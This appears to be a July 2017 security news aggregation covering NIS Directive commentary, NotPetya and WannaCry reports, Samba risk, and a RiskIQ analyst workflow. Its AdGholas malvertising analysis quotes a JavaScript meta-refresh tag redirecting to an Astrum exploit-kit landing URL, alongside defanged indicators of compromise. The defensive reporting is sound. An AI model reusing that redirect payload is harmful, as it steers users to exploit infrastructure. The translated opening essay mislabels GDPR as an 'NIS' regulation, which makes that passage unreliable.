Notwithstanding the NIS Directive applies only to “macro categories” i.e. to essential service operators (energy, transport, banking, health, etc.), while Regulation NIS no. 679/2016 applies to all companies, it is to be noted that the business fabric present on Italian territory is predominantly made up of SMEs which as such cannot benefit from the protection provided by the NIS; therefore, it would be desirable, in addition to an either convergence of the norms now cited, and the creation within the various trade associations (such as Confindustria, Confagricoltori, Confartigianato), of structures capable of receiving news of any incidents  that have occurred to their associates and then, in turn, communicating them and CSIRT.

The constituent entity, within the category of associations, should essentially reflect the structure of the CSIRTs as set out in the NIS Directive, assuming a dual function: first, the protection of small and medium-sized enterprises from potential cyber attacks that could hurt or even blocking production by violating the informative and sensitive data present in the servers of the companies themselves; and second the assessment of the reliability of affiliated companies, in that way, for the development of a sort of “computer reliability rating” both on the prevention of computer accidents and on the contrary, and by ensuring a high level of protection of sensitive data.

It is believed that any user of the services produced by the subjects concerned should be able to know whether the company to which it is addressed is substantially reliable from a computer point of view and to know how to hold sensitive data on the servers of the company itself. Think, for example, of the case of a clinic and a patient who may be affected by a disease, a condition that, if spread, could severely damage the patient’s reputation. Or the case of a large company that would like to take advantage of the collaboration of a company for the development of the inductor: it is evident that it is useful to be aware of the reliability of the computer systems used.

To ensure the full operation of the description, it would be necessary to have the “mini CSIRT or CSIRT category” within each category association linked to a national CSIRT, which is then connected to the CSIRT network at a community level.

In addition, in a top-down view, the “CSIRT category”, present within each category association, are linked to a national CSIRT, which is then linked to the CSIRT network at Community again at a community level.

Furthermore, in a top-down view, the “CSIRT category”, if aware of an incident that happened to one of its associates, must report the incident not only to the national CSIRT but also to the other members of the association, avoiding possibly spreading the name of the affected affiliate for reasons of company reputation.

Companies will also have to set up a biennial plan to prevent computer attacks and protect sensitive data contained in their servers.

Consequently, every two years, the CSIRT category will list a list of associated companies by providing a rating of their reliability based on the level of prevention from computer incidents reached. This will greatly contribute to protecting the members of the association and improving prevention against cyber attacks and supporting actions in the event of a wasted attack.

Such a system, which, moreover, refers to a duty of cooperation enshrined in the world as well as in the community, can guarantee to public companies, private individuals and users of the services produced, more and more secure computer systems and the capability of dealing with hacker attacks while not abandoning victims and their users to their destiny, without specific reference points.

I conclude by making the conclusions of Prof. Pierluigi Paganini in his intervention “From the Wannacry case to the NIS Directive, critical infrastructures are still too vulnerable” in which it was expressly stated that: “… recalling that the security of our infrastructures also depends on the posture of the citizens. We need to learn about computer threats and how to defend ourselves from them. We are the knot of a global network with which we exchange a huge amount of information filtering or configuration errors in the systems we use every day could lead to risk situations for the entire community. ”

WannaCrypt ransomware

And I would add that as for the contrast to the offenses committed by minors in the Network, the aspect of education and prevention is the most important thing for the prevention. One has to enter once and for all in the perspective for which no small or large world player (physical and/or juridical persons) can feel immune to attacks and therefore have to be cyber protectors while never underestimating the risk and it’s results. We must also educate ourselves that what is happening in the virtual world has more and more serious repercussions on the real world and on the fate of the cyber attack victim.

Author Attorney Marco Mariscoli

Pierluigi Paganini 

(Security Affairs – ransomware , cybercrime)

&https

The post Risks of hacking attacks: Ransomware – Cryptolocker and tutorials for Italian SMEs in the light of the Network and Information Security (NIS) Directive. appeared first on Security Affairs.

5 Things Marketers Should Do After the Next Cyberattack

July 06, 2017 07:00 AM - Neustar -

Note: This article was originally published in Advertising Age on June 29, 2017.

The week after Cannes typically involves recovering from too much rosé, following up on some great meetings, and for a lucky few, perhaps an extended holiday. A worldwide cyberattack was not part of the agenda for folks across adland. It's a sobering reality that most brands and agencies are not prepared for.

This is an industry wake-up call.

Cybersecurity is a $445 billion problem, and some predict that figure could rise to $6 trillion by 2021. CEO and boards are rightfully worried about the risks to their business: A March 2017 report by executive search firm SpencerStuart found that 39% of board directors said they discuss cybersecurity at every meeting and that 40% of respondents reported their board has at least one director with cyber expertise. An additional 7% are in the process of recruiting one.

So what's a CMO to do?

In its May 2017 Cyber Insights Research Report, Neustar found that 40% of companies discovered a distributed denial-of-service (DDoS) attack through their very own customers. No one in marketing should be caught flat-footed when a cyberattack happens. For starters, marketers need to understand what type of attacker they're dealing with (see below), then proceed accordingly:

1. Identify all key cybersecurity stakeholders across the company

Everyone in marketing should know who the key players are internally at the company. Security should be everyone's job. You may have some or all of the following key roles at your company, so get to know these execs and their key lieutenants and what they do: Chief Information Security Officer (CISO), Chief Data Officer (CDO), Chief Technology Officer (CTO), Chief Information Officer (CIO), Chief Risk Officer (CRO).

2. Understand your brand's specific risks

Map out all of the customer touchpoints you have and list all of the key technologies that underpin that touchpoint. For example, a retailer needs to think not only about online and offline touchpoints, but call centers, point-of-sales systems, CRM databases, mobile applications, supply chain distribution, email and much, much more. Those are just direct interfacing technologies to customer touchpoints. You will also need to map out second derivative technologies. One retailer identified that their data breach could be traced to a third-party contractor who had been compromised while having credentials to access the company's computer network.

3. What's your role in business continuity management?

The companies that are most prepared for a cyberattack have a well-defined Business Continuity Plan, which should provide a roadmap for responding to a range or potential emergencies relating to the people, the customers, the partners, the data and the facilities that comprise business assets. How is marketing involved in your company's BCP? Do you even know what your company's BCP is? Do you have messages and communications templates ready for when there is an issue?

4. Ask questions … Lots of them

While many marketers are learning about customer data and privacy matters, this is the right time to ask more security-related questions so you can learn more. When it comes to questions, here are some to start with.

  • What was our most significant cybersecurity incident? What was our response?
  • What was our most significant near miss? How was it discovered?
  • How can marketing help with our cybersecurity initiatives?
  • What are considered our tier 1, 2 and 3 priorities during a cyberattack?
  • How is the performance of our security team evaluated?
  • Do we have relationships with law enforcement, such as the FBI and Interpol?
  • How are we thinking about security with our supply chain partners, vendors and other partners?
  • What is our plan to communicate internally and externally to all key stakeholders?
  • Bookmark key websites like U.S. Homeland Security and cybersecurity thought leader Brian Krebs so you get up-to-date information.

5. Do what you do best: Market

Marketers can help their security executives with internal security marketing campaigns. Partner with these leaders to offer training, webinars, lunch-and-learns, and general security awareness to your employees. Security is a shared responsibility and we are only as strong as our weakest link. Help to build a security-aware culture that identifies and prevents possible attacks.

TAXONOMY OF AN ATTACKER

Before responding to a cybersecurity attack, companies need to know what type of attacker they're dealing with. There are 6 main species:

THE THIEF

This is probably the most well-known type of cyberattack, which usually involves stealing some type of login credentials or hacking of systems to steal sensitive information such as financial (i.e., credit card, bank, etc.) or medical data.

Fun fact: Cybercriminals attack the healthcare industry more than any other sector, and your medical information is worth 10 times more than your credit card number on the black market.

THE KIDNAPPER

Typically referred to as “ransomware”, this is digital extortion. A type of malicious software (“malware”) is used to block access to the victim's files or applications and makes them useless. The victim must pay a ransom to gain access or recover the files. This can be a targeted attack or a random attack put out into the wild done by individual hackers or organized crime. This week's Petya is the latest in an alarming rise in ransomware attacks.

Fun fact: Global ransomware damage costs are predicted to exceed $5 billion in 2017. That's up from $325 million in 2015 — a 1,500% increase in two years, and expected to worsen.

THE DISRUPTER

These are attacks that are global in nature, wide-ranging and do not necessarily discriminate among governments, companies or individuals. The goal is to disrupt, sometimes just to show that you can. Taking down a website or even discovering and exploiting new vulnerabilities is practically sport for hackers and it earns serious bragging rights.

Fun fact: The October 2016 Mirai cyberattack against Domain Name System (DNS) provider Dyn (now owned by Oracle) took down high-profile sites ranging from Pinterest and Twitter to Netflix and Walgreens. It was one of the largest DDoS attacks ever. Mirai malware infected devices to form a robot network or "botnet" and coordinated the bombarding of servers with Internet traffic until the website collapsed under the strain. Mirai was the first botnet made up of "Internet of Things" (IoT) devices such as DVRs, webcams and other connected devices. So yes, your DVR might be working for the enemy.

THE ACTIVIST

Whether it’s protesting a belief, a cause, or an individual, these are the “hacktivists” that are making a statement. It can be political in nature or values-driven, ranging from organizations to individual hackers making their voice heard.

Fun fact: While WikiLeaks dominated the headlines throughout the 2016 election cycle, Anonymous is perhaps the most active and prominent group over the past decade. Anonymous rose to prominence in 2008 when they unleashed a massive DDoS attack against the Church of Scientology.

THE STATE

What used to be something you'd see in the movies is now real-life. Whether it’s government espionage or cyberwarfare, politically motivated attacks range from spying to stealing intelligence, to sabotaging plots to actual warfare.

Fun fact: Discovered in 2010, the Stuxnet computer worm was responsible for causing serious damage to Iran's nuclear program, ruining approximately one-fifth of their nuclear centrifuges.

THE TERRORIST

The scariest of them all. From rogue hackers to terrorist organizations, this is where the connected world gets truly dangerous. In 2017, there are more machines behind IP addresses than humans. As IoT becomes pervasive, the threat of taking out mission-critical infrastructure like power grids to telecommunications networks is increasingly real. This can affect anything and everything from connected cars to hospitals to airplanes.

Fun fact: This May, 16 hospitals across the United Kingdom were unable to access basic medical records due to the WannaCry ransomware attack. Just imagine if instead of ransoming for data, the cyberattackers threated to shut down the hospital's power.

The Impact of a Security Breach 2017

July 06, 2017 04:00 AM - Dark Reading - Despite the escalation of cybersecurity staffing and technology, enterprises continue to suffer data breaches and compromises at an alarming rate. How do these breaches occur? How are enterprises responding, and what is the impact of these compromises on the business? This report offers new data on the frequency of data breaches, the losses they cause, and the steps that organizations are taking to prevent them in the future.

[Strategic Security Report] Assessing Cybersecurity Risk

July 06, 2017 04:00 AM - Dark Reading - As cyber attackers become more sophisticated and enterprise defenses become more complex, many enterprises are faced with a complicated question: what is the risk of an IT security breach? This report delivers insight on how today's enterprises evaluate the risks they face. This report also offers a look at security professionals' concerns about a wide variety of threats, including cloud security, mobile security, and the Internet of Things.

Is Your Company Security Strategy Obsolete?

July 06, 2017 03:02 AM - TripWire - The State of Security -

The DDoS attacks of 2016 and the WannaCry ransomware that recently affected thousands of computer systems have compelled businesses to look into their security mechanisms and identify the pitfalls that might make them a victim of cyber threats in the future. Verizon had already highlighted the intensity of upcoming challenges in their annual 2016 Data […]… Read More

The post Is Your Company Security Strategy Obsolete? appeared first on The State of Security.

Why Small Businesses Don’t Care About Cyber Security

July 06, 2017 03:00 AM - TripWire - The State of Security -

With millions of small businesses out there, why don’t they care about cyber security? You may be reading this and own a small business or know someone that does. Think to yourself: why would small businesses not care about cyber security? You may find that it is not a problem of caring but a problem […]… Read More

The post Why Small Businesses Don’t Care About Cyber Security appeared first on The State of Security.

Bitcoin Funds Stolen from Bithumb Exchange

July 06, 2017 12:25 AM - Dark Reading - Exchange employee's home PC the initial attack vector.

July 05, 2017

Sabre Update on Cybersecurity Incident

July 05, 2017 09:36 PM - Office of Inadequate Security - SOUTHLAKE, Texas, July 5, 2017 /PRNewswire/ — Sabre Corporation (NASDAQ: SABR) issued the following statement regarding a cybersecurity incident first disclosed on May 2, 2017: Since June 6, Sabre has notified and been working with certain customers and partners that use or interact with Sabre Hospitality Solutions’ (SHS) SynXis Central Reservations system (SHS reservation system) about our [...]

While investigating one ransomware attack, Walnut Place hit with second attack

July 05, 2017 09:30 PM - Office of Inadequate Security - On May 12, I  posted a press release from Walnut Place about a ransomware attack that had occurred in January. Their press release did not disclose that they had become aware of a second ransomware attack on May 6. A new press release, dated today, does: On March 13, 2017, Walnut Place leadership was informed [...]

Two charged with running hacking service used in ‘major computer intrusions’ of U.S. businesses

July 05, 2017 09:23 PM - Office of Inadequate Security - Rachel Weiner reports: Two men from Latvia ran a malware service that has been in operation for more than a decade and used in major attacks against U.S. businesses, according to an indictment unsealed Wednesday in federal court in Alexandria, Va. The men, along with an alleged co-conspirator in Virginia, designed a buffet of hacking [...]

23% off FitBit Aria WiFi Smart Scale - Deal Alert

July 05, 2017 09:05 PM - CSO Online - Track and wirelessly sync your weight, % body fat, and Body Mass Index (BMI) to Fitbit.com. This 23% off deal saves you $30 on its regular list price.

AV-TEST: The number of malware decreases, but their complexity increases

July 05, 2017 08:31 PM - Security Affairs -

According to the AV-TEST Security Report 2016/2017 published by the independent anti-virus testing outfit AV-TEST, the number of malware decreases, but …

According to the AV-TEST Security Report 2016/2017 published by the independent anti-virus testing outfit AV-TEST, the number of malware samples detected in 2016 decreased compared to 2015, but they have been more sophisticated.

The recent NotPetya and WannaCry ransomware-based massive attacks, IoT malware like Mirai and banking Trojans implement new sophisticated techniques to avoid detection and to rapidly spread.

AV-TEST spotted roughly 127.5 million malware samples in 2016, meanwhile, the number of samples discovered in 2015 was 144 million (+14%).

AV-TEST report 2016 - 2017

The research institute observed roughly 350,000 new malware samples each day, that correspond to four new samples per second.

Less than one percent of the total share of Windows malware is represented by Ransomware, but the damage caused by this threat is severe.

“Comprising not even 1% of the overall share of malware for Windows, the blackmail Trojans appear at first glance to be a marginal phenomenon. The fact that this type of assessment is incorrect can be explained via the mode of action and damage created by this class of Trojans. ” states AV-TEST.

“A level of distribution comparable to traditional viruses is not required to reap the greatest possible profit. Ransomware involves ‘high-tech malware’, which seeks its victims above all in a targeted business environment. For instance, emails infected with ransomware are sent out almost exclusively on weekdays.” 

According to the researchers, the number of ransomware attack peaked in the Q1 2017.

AV-TEST reported a significant increase in the number of Mac OS samples (+370%) compared to 2015. The majority of malware was Trojan, more than 4,000 new samples were already identified in Q1 2017.

“Compared to the previous year, the malware sector for macOS is experiencing 370% percent growth. However, it is also important to keep an eye on the overall number of malware programs: Whereas in 2015 there were still a moderate 819 different malware threats targeting macOS, Apple users in 2016 already had to protect their devices from 3033 malware samples.” states the report.

The report confirms the number of Android malware samples doubled in 2016 to over 4 million, in June AV-TEST identified nearly 650,000 new samples of malware.

Give a look at the AV-TEST Security Report 2016/2017 !

Pierluigi Paganini

(Security Affairs – AV-TEST, malware)

&https

The post AV-TEST: The number of malware decreases, but their complexity increases appeared first on Security Affairs.

New FTC Policy Would Shield Lawyers, Staff From Personal Liability

July 05, 2017 07:58 PM - Office of Inadequate Security - C. Ryan Barber reports: The Federal Trade Commission on Wednesday adopted an indemnity policy that will shield lawyers and other staff from any personal liability for enforcement actions that draw a lawsuit and expose them to a monetary judgment. The policy, adopted without public comment, will allow the agency to cover the cost of any [...]

Updates to NotPetya Lead to Server Seizure at Ukrainian Software Firm

July 05, 2017 07:55 PM - Dark Reading - Police seized servers from Ukraine's Intellect Service as the country scrambles to control a cyberattack allegedly conducted by advanced hackers.

[Video] Ukrainian Police Seize Servers of Software Firm Linked to NotPetya Cyberattack

July 05, 2017 07:40 PM - The Hacker News - Ukrainian National Police has released a video showing officers raiding company of M.E.Doc accounting software makers, whose systems have been linked to outbreak of Petya (NotPetya) ransomware that recently infected computers of several major companies worldwide. On 4th July, masked police officers from Ukrainian anti-cybercrime unit — carrying shotguns and assault rifles — raided the

How Cisco is establishing itself as a cybersecurity leader

July 05, 2017 07:33 PM - CSO Online -

Welcome to the new home of my blog here at CSO! I spent a few days at CiscoLive last week, Cisco’s annual user conference, in steamy Las Vegas. As a cybersecurity professional, I really filtered out a lot of other content to focus on all-things infosec.  Here are a few of my observations:

1. As the fastest growing business unit at Cisco, cybersecurity certainly received plenty of top billing. CEO Chuck Robbins highlighted security in his keynote and even chatted cybersec with Apple CEO Tim Cook during his presentation. In fact, Apple and Cisco announced a partnership to secure iOS devices moving forward.

2. If your image of Cisco is firewalls and IDS/IPS, you’re kind of stuck in a 2005 mindset. Cisco has a wide assortment of products for cloud security, endpoint security, security analytics, etc. Cisco is even investing heavily in cybersecurity services to help its customers impacted by the cybersecurity skills shortage.

To read this article in full or to leave a comment, please click here

Threat Actors Target Chinese Language News Sites

July 05, 2017 06:56 PM - Threatpost - Citizen Lab investigates the targeting of Chinese language news websites in a phishing attack that leveraged the NetWire remote access Trojan.

How Does Samba Compare to WannaCry?

July 05, 2017 06:29 PM - Infosec Island -

Many reports are drawing comparisons between the Samba vulnerability and WannaCry, withsome even dubbing it SambaCry. There’s no denying that the Samba vulnerability is serious. It also shares some similarities with WannaCry: it exploits a vulnerability in a service that utilizes Windows' SMB protocol, and, like WannaCry, is 'wormable' – meaning each infected machine could potentially infect other machines in its network, significantly increasing the spread of the malware. But, it doesn’t pose the same widespread risk as WannaCry.

To start, the number of potential targets of the Samba vulnerability is significantly less. Of the 2.3 million machines worldwide, the Samba vulnerability could only potentially impact a fraction – 60,000 to be exact. While, from a first glance, it would seem like there are millions of machines running Samba, from routers and network printers to your home NAS, there are several factors that must align for a machine to be exploited by this vulnerability:

  1. The machine needs to have TCP port 445 open and directly connected to the internet – this brings the number of potential targets down to 2.3 million machines worldwide;
  2. Guest login without password needs to be enabled – down to 980 thousand machines worldwide;
  3. The server is indeed running the vulnerable SAMBA version – down to 120 thousand machines worldwide;
  4. A writeable network share needs to exist on the system – down to about 70 thousand machines worldwide;
  5. And, finally, Samba inter-process communication needs to be enabled – down to about 60 thousand machines worldwide.

Although the risk is not as dire as WannaCry, organizations should always be vigilant to protect against any potential threats and should not ignore the possibility of an attacker exploiting Samba. The following “Three P’s” will help mitigate the potential threat posed by the Samba vulnerability to your business:

  • Patch, Patch & Patch: If a Samba server is enabled on a targeted device, or if your business is running an older Samba protocol version, keep that device updated with recent patches. File sharing is a business need, and patches will ensure that your system remains secure.
  • Password Protect: Often, guest logins do not require a password; however, all systems should be password protected to deflect attacks. Without a password, your system remains vulnerable.
  • Port it Shut: Firewalls are important, and ensuring that the specific Samba 445 Port is closed will eliminate the threat of external exploitation.

With new vulnerabilities constantly being brought to light, there’s considerable fear of security risks, and confusion about what these risks mean to organizations. In the case of the Samba vulnerability, it’s important to remember that this is just a vulnerability. There is no evidence to suggest that if a malware exploits the Samba vulnerability that it will be a ransom malware, nor would this likely be a massive attack.

But, organizations should always be aware of potential threats. They need to understand the business and technical implications of their systems’ vulnerabilities, and select the best set of controls to prevent attackers from using exploits.

About the author: Rotem Iram is the Founder and CEO of stealth cyber insurance company CyberJack. With nearly two decades of security and engineering experience, Rotem previously served as a Managing Director and COO in the Cyber Security practice of K2 Intelligence, a leading global risk management firm, focusing on cyber intelligence, cyber defense strategy, and incident response.

Copyright 2010 Respective Author at Infosec Island

Security executives on the move and in the news

July 05, 2017 06:00 PM - CSO Online -

The upper ranks of corporate security are seeing a high rate of change as companies try to adapt to the evolving threat landscape. Many companies are hiring a chief security officer (CSO) or chief information security officer (CISO) for the first time to support a deeper commitment to information security.

CSO’s Movers & Shakers is where you can keep up with new senior level security executive appointments and perhaps gain a little insight into hiring trends. If you have an announcement of your own that you would like us to include here, contact Michael Nadeau, senior editor.  

June 29, 2017: Yassir Abousselham named CSO for identity solution provider Okta

A former Google executive, Abousselham brings nearly 20 years of experience leading security teams to Okta. Most recently, he was the CISO for SoFi, where he built the company's information security and privacy program. Abousselham will report directly to Okta's CEO, Todd McKinnon.

To read this article in full or to leave a comment, please click here

News in brief: cryptocurrency exchange hacked; laptop ban further eased; AA under fire over data breach

July 05, 2017 05:56 PM - Naked Security - Your daily round-up of some of the other stories in the news

Dubai Deploying Autonomous Robotic Police Cars

July 05, 2017 05:48 PM - Schneier on Security -

It's hard to tell how much of this story is real and how much is aspirational, but it really is only a matter of time:

About the size of a child's electric toy car, the driverless vehicles will patrol different areas of the city to boost security and hunt for unusual activity, all the while scanning crowds for potential persons of interest to police and known criminals.

Libgcrypt ‘Sliding Right’ Attack Allows Recovery of RSA-1024 Keys

July 05, 2017 05:48 PM - Threatpost - GnuPG recently patched cryptographic library Libgcrypt, preventing a local side-channel attack; something that could have allowed full key recovery for RSA-1024.

A Blue Team's reference guide to dealing with Ransomware

July 05, 2017 05:46 PM - Salted Hash -

Ransomware has been around since 2013, but it was the success of CryptoLocker that spawned a booming vertical market for criminals. Last week, as June came to a close, criminals leveraged the fear associated with the Petya Ransomware family to create chaos across the globe.

Last week's attack, dubbed NotPetya, masqueraded as a Ransomware attack, but that wasn't the real goal. While the funds collected by the criminals have been retrieved, experts have determined that chaos was the ultimate goal.

To read this article in full or to leave a comment, please click here

A Blue Team's reference guide to dealing with Ransomware

July 05, 2017 05:46 PM - CSO Online -

Ransomware has been around since 2013, but it was the success of CryptoLocker that spawned a booming vertical market for criminals. Last week, as June came to a close, criminals leveraged the fear associated with the Petya Ransomware family to create chaos across the globe.

Last week's attack, dubbed NotPetya, masqueraded as a Ransomware attack, but that wasn't the real goal. While the funds collected by the criminals have been retrieved, experts have determined that chaos was the ultimate goal.

To read this article in full or to leave a comment, please click here

A Blue Team's reference guide to dealing with Ransomware

July 05, 2017 05:46 PM - Salted Hash -

Ransomware has been around since 2013, but it was the success of CryptoLocker that spawned a booming vertical market for criminals. Last week, as June came to a close, criminals leveraged the fear associated with the Petya Ransomware family to create chaos across the globe.

Last week's attack, dubbed NotPetya, masqueraded as a Ransomware attack, but that wasn't the real goal. While the funds collected by the criminals have been retrieved, experts have determined that chaos was the ultimate goal.

To read this article in full or to leave a comment, please click here

A Blue Team's reference guide to dealing with Ransomware

July 05, 2017 05:46 PM - CSO Online -

Ransomware has been around since 2013, but it was the success of CryptoLocker that spawned a booming vertical market for criminals. Last week, as June came to a close, criminals leveraged the fear associated with the Petya Ransomware family to create chaos across the globe.

Last week's attack, dubbed NotPetya, masqueraded as a Ransomware attack, but that wasn't the real goal. While the funds collected by the criminals have been retrieved, experts have determined that chaos was the ultimate goal.

To read this article in full or to leave a comment, please click here

39% off Exploring Raspberry Pi: Interfacing to the Real World with Embedded Linux, Paperback - Deal Alert

July 05, 2017 05:39 PM - CSO Online -

The Raspberry Pi's most famous feature is its adaptability. It can be used for thousands of electronic applications (See: "How to build a Raspberry Pi retrogaming emulation console"). This book, Exploring Raspberry Pi, is the innovators guide to bringing Raspberry Pi to life. The book favors engineering principles over a 'recipe' approach to give you the skills you need to design and build your own projects. You'll understand the fundamental principles in a way that transfers to any type of electronics, electronic modules, or external peripherals, using a "learning by doing" approach that caters to both beginners and experts. The book begins with basic Linux and programming skills, and helps you stock your inventory with common parts and supplies. Next, you'll learn how to make parts work together to achieve the goals of your project, no matter what type of components you use. The companion website provides a full repository that structures all of the code and scripts, along with links to video tutorials and supplementary content that takes you deeper into your project. The list price has been reduced 39% on Amazon, from $35 to $21.40. See this deal now on Amazon. A complete Raspberry Pi starter kit can be purchased here for $89.99

To read this article in full or to leave a comment, please click here

'Crackas With Attitude' Hacker Sentenced for Targeting Government Officials

July 05, 2017 05:00 PM - Dark Reading - A North Carolina man known as 'Incursio' goes to prison for hacking government systems as well as senior government officials.

Hackers Connected to NotPetya Ransomware Surface Online, Empty Bitcoin Wallet

July 05, 2017 04:41 PM - Office of Inadequate Security - Lorenzo Franceschi-Bicchierai  reports: Hackers connected to the disruptive world-wide ransomware attack that crippled Ukraine and hit computers all over the world have surfaced online. Bitcoin sent to the hackers by victims has been moved from an online wallet, and someone seemingly connected to the group is now asking for more money. On June 28, unknown [...]

Illinois poised to ban geolocation tracking without consent

July 05, 2017 04:31 PM - Naked Security - Great news, right? But is it a waste of time, or a welcome step towards greater privacy?

Researchers Build Firewall to Deflect SS7 Attacks

July 05, 2017 04:20 PM - Dark Reading - Security researchers will release an open-source SS7 firewall at Black Hat USA that aims to bolster security of mobile operators' core networks.

June 2017: The Month in Ransomware

July 05, 2017 04:17 PM - TripWire - The State of Security -

When it seemed that ransomware authors hit the lowest of the low with their attacks a long time ago, they managed to take it a notch further last month. With the revamped Petya Trojan that surfaced on June 27, the crooks broke new ground and started waging a real cyber war against a particular country. […]… Read More

The post June 2017: The Month in Ransomware appeared first on The State of Security.

AdGholas malvertising thrives in the shadows of ransomware outbreaks

July 05, 2017 04:05 PM - Malwarebytes Unpacked -

The latest wave of ransomware following the WannaCry outbreak has kept everyone very busy and been the topic of many conversations. In the meantime, other threat actors have been quite active and perhaps even enjoyed this complimentary diversion. This is certainly true for the most prolific malvertising gang of the moment, dubbed AdGholas.

Exposed a few times this year by ProofPoint and TrendMicro, AdGholas is playing a whack-a-mole game with the ad industry to distribute malware onto unsuspecting users with the help of the Astrum exploit kit.

A master of disguise, AdGholas has been flying right under the nose of several top ad networks while benefiting from the ‘first to move’ effect. Indeed, the malvertising operators are able to quickly roll out and activate a fake advertising infrastructure for a few days before getting banned.

On June 28 (which is about ten days after it was last publicly reported), we started seeing a new wave of drive-by download attacks distributed globally pushing the Astrum exploit kit. Sure enough, it was associated with AdGholas activity via a decoy website. Behind the fake ad banners for ‘expert essays’ designed to trick ad agencies, laid code to exploit and infect users who simply happened to visit popular websites.

The fraudulent website expert-essays[.]com, which was registered June 22, is using a certificate from Let’s Encrypt, and is a replica from essayoneday.com. There are only a few minor visual differences between the two, and a cursory review would reveal the copycat. However, it is easier said than done in an industry dominated by automation and volume.

After getting caught, AdGholas came back up again on July 1st and 2nd – perhaps a long holiday week-end in the US may have seemed like the right timing – via a new decoy site, jet-travels[.]com, with the same modus operandi:

From AdGholas to Astrum EK

We collected artifacts that show us the redirection between the AdGholas group and the Astrum exploit kit. This kind of redirect is highly conditional in order to evade the majority of ad scanners. While many malvertising actors do not care about cloaking, it is very important to others such as AdGholas because stealthiness is a strength that contributes to its longevity.

The redirect tag hosted on expert-essays[.]com loads a landing page for the Astrum exploit kit with:

[“javascript:%27<meta http-equiv=refresh content=\\\”0;url=”,”\\\”>%27″,”https:\/\/comm.clamotten.com\/7pkzi\/-fb2j5s48sv4b\/nlo17hdt0cexguqnir\/kqh-xya-c6do32smjwh9mnc0″,”ae0a5bca85a8f0e1″]

The group behind Astrum EK is also very sneaky, making good use of SSL, domain shadowing and other server side tricks that render traffic collection and replay a challenge. In the current exploit kit landscape, domain shadowing has been slowed down and the popular RIG EK is mainly resorting (other than for a few exceptions) to IP addresses, in lieu of shadowed domains. As far as serving the content, plain HTTP is the norm, setting Astrum EK apart from the rest.

For a long time banking Trojans were the payload of choice for Astrum EK. This seemed to fit in with the elusive and muffled nature of the exploit kit. However, according to ProofPoint, new AdGholas/Astrum infection chains have recently been dropping ransomware. Although it’s a change from those threat actors’ style, cashing in on the ransomware frenzy makes sense.

Containment and protection

Malvertising continues to affect users on a large scale and is a relied upon infection vector for threat actors. The recent and renewed activity from sophisticated groups like AdGholas is something to watch out for in a drive-by landscape dominated by malvertising-borne attacks more so than from compromised sites.

Ad-blockers are one of several layers end users can rely on, but it is worth noting that even ad-blockers can be bypassed and do not fix the most common underlying issue which is outdated software. In other words, patching machines regularly immediately raises the difficulty level for an attacker to compromise your system. However, knowing that threat actors like AdGholas and Astrum EK are advanced and have employed zero-days, it is also important to use a signature-less and proactive defense to handle those cases.

We’re happy to report that Malwarebytes users were protected against these malvertising campaigns already.

Indicators of compromise (IOCs)

AdGholas:

expert-essays[.]com
jet-travels[.]com
5.34.180.73
162.255.119.165

Astrum Exploit Kit:

uniy[.]clamotten[.]com
comm[.]clamotten[.]com
comp[.]computer-tutor[.]info
lexy[.]computer-tutor[.]info
sior[.]ccnacertification[.]info
kvely[.]our-health[.]us
nuent[.]mughalplastic[.]com
mtive[.]linksaffpixel[.]com
cons[.]pathpixel[.]com
sumer[.]pathlinkaff[.]com
nsruc[.]ah7xb[.]com
ction[.]ah7xb[.]com
nstru[.]onlytechtalks[.]com
const[.]linksaffpixel[.]com
quely[.]onlytechtalks[.]com
coneq[.]modweave[.]com
94.156.174.11
SWF: 4ad7556a7ef85be260a8c10cfbc855234f0e9b8880db2be17ad0ad1d6e52909e

The post AdGholas malvertising thrives in the shadows of ransomware outbreaks appeared first on Malwarebytes Labs.

Ukrainian police seize computers that spread global NotPetya attack

July 05, 2017 04:03 PM - CSO Online -

Ukraine's Cyber Police have intervened to prevent further cyberattacks in the wake of last week's global attack, initially considered to be ransomware and called by various names including NotPetya.

The attack affected businesses around the world, but Ukraine was hit particularly hard because, security researchers believe, the initial attacks were disguised in an automatic update to the MEDoc tax and accounting software widely used in the country.

A backdoor could have have been introduced into M.E.Doc as early as May 15, the police said, after one of the developer's computers was taken over.

Police said Wednesday that they had seized computers and software from M.E.Doc's developer after spotting fresh signs of malicious activity, and have taken the items away for analysis. They hope this will put an end to further uncontrolled distribution of the NotPetya malware (also referred to as Diskcoder.c, ExPetr, PetrWrap and Petya) used in the previous attack, they said.

To read this article in full or to leave a comment, please click here

Threat Analyst Using RiskIQ PassiveTotal: A Day in the Life

July 05, 2017 04:00 PM - RiskIQ -

John is a tier-two threat analyst on a SOC team that consists of five analysts. John, whose team works for a public sector organization, uses RiskIQ PassiveTotal daily to aid his investigations of indicators of compromise (IOCs) with minimal false positives during incident response.

The team leverages the relationships between the highly connected data collected by RiskIQ inside the RiskIQ PassiveTotal platform, pivoting on its unique data sets to surface new connections, group similar attack activity, and substantiate assumptions for each IOC.

However, John’s team did not always use RiskIQ PassiveTotal.

Once upon a time, they used a manual, highly segmented workflow comprised of a cocktail of different tools. According to John, below is an example of what a typical incident response might have looked like for him in the pre-PassiveTotal days. We will use an IP from a recent event in which the Lazarus Group attacked Polish banking establishments as the example.

The IP 109[.]164[.]247[.]169 is flagged through IDS.

1. John logs into Domain Tools for IP WHOIS lookup, which provides WHOIS information such as the resolving host, WHOIS history, contract emails, and more:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-1 WHOIS info inside DomainTools

2. In a separate tab, he opens Mnemonic for Passive DNS lookup, which pulls in domains resolving to the suspect IP:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-2 DNS lookup inside Mnemonic

3. To see if there is any open source intelligence on the IP, he opens several tabs to search multiple sources, such as Phishtank, FireEye blog, Facebook, threat exchange, and more:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-3 Various OSINT tools

4. Next, he opens up a new tab to check the domains he found in Mnemonic against hashes in VirusTotal:

John is a threat analyst on a SOC team that uses PassiveTotal to investigate indicators of compromise (IOCs) with few false positives. Here's his story.

Fig-4 Hashes inside VirusTotal

Through these steps, John was able to gather a good deal of knowledge about this IP—WHOIS information, passive DNS, OSINT, and hashes. If his initial research uncovers something interesting, John could spend more time on that area to dive deeper. Doing investigations this way can easily take anywhere from 10-15 minutes each, with up to six different sources.

Now, let’s take a look at what the same investigation would look like today, now that John and his team uses RiskIQ PassiveTotal.

The IP 109[.]164[.]247[.]169 is flagged through IDS.

